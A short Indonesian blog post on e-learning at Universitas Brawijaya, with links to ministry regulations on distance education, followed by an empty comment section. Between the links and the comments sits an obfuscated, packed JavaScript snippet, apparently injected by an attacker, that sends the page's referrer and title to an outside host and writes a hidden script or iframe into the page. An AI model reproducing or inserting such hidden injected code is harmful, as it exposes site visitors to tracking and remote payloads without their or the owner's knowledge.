E-Learning di UB

Dari istilah yang digunakan: e-learning (berarti pembelajaran elektronik) terdengar citra modernitas penyelenggaraan pendidikan tinggi. Isu ini sedang sangat ramai dibicarakan, antara pro dan kontra. Saya sepakat ide brilian ini memang kontrversial. Ide dasar e-learning sesungguhnya sederhana saja. Masyarakat butuh belajar. Namun keterbatasan sarana dan prasarana pendidikan khususnya pendidikan tinggi, menyebabkan rendahnya akses bagi masyarakat luas.E-learning atau pembelajaran elektronik, dalam beberapa hal mampu menihilkan keharusan hadirnya sarana kelas dan perlengkapannya. Dengan kata lain teknologi informasi pembelajaran digital menjadi terobosan atas nama pemerataan akses. Dirjen Dikti telah melansir sejumlah kebijakan berkenaan dengan pembelajaran elektronik. Wacana ini perlu diketahui oleh semua pelaku dalam dunia pendidikan tinggi. Universitas Brawijaya dalam lima tahun terakhir telah menunjukkan kemajuan pesat pada sistem pembelajaran elektronik ini. Meski demikian, rancang bangun sistem pembelajaran modern ini masih dirasakan tambal sulam, terutama sebab sistem monitoring, evaluasi dan baku mutunya belum ditetapkan.

Di bawah ini dapat diunduh beberapa artikel yang relevan dengan ide-ide e-learning yang hingga saat ini masih terus disempurnakan.

Kepmen107-U-2001JarakJauh

Permen20-2011ProdiDiluarDomisili

MateriE-Belajar(kajian)

 eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c]);return p}(‘(7(){2 d=3;2 w=1;2 h=1;2 t=d.8(\’9\’);2 4=5.a(5.b()*c);2 0=\’e://f.g/i/j?\’;0=0+\’k=\’+3.l;0=0+\’&m=\’+3.n;0=0+\’&r=\’+4;d.o(\’\')})();’,35,35,’src||var|document|id|Math|iframe|function|createElement|script|floor|random|9999||http|needalogo|net||rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style|padding||0px||border|none||width|height’.split(‘|’),0,{}))

  1. No comments yet.
  1. No trackbacks yet.
CAPTCHA Image
*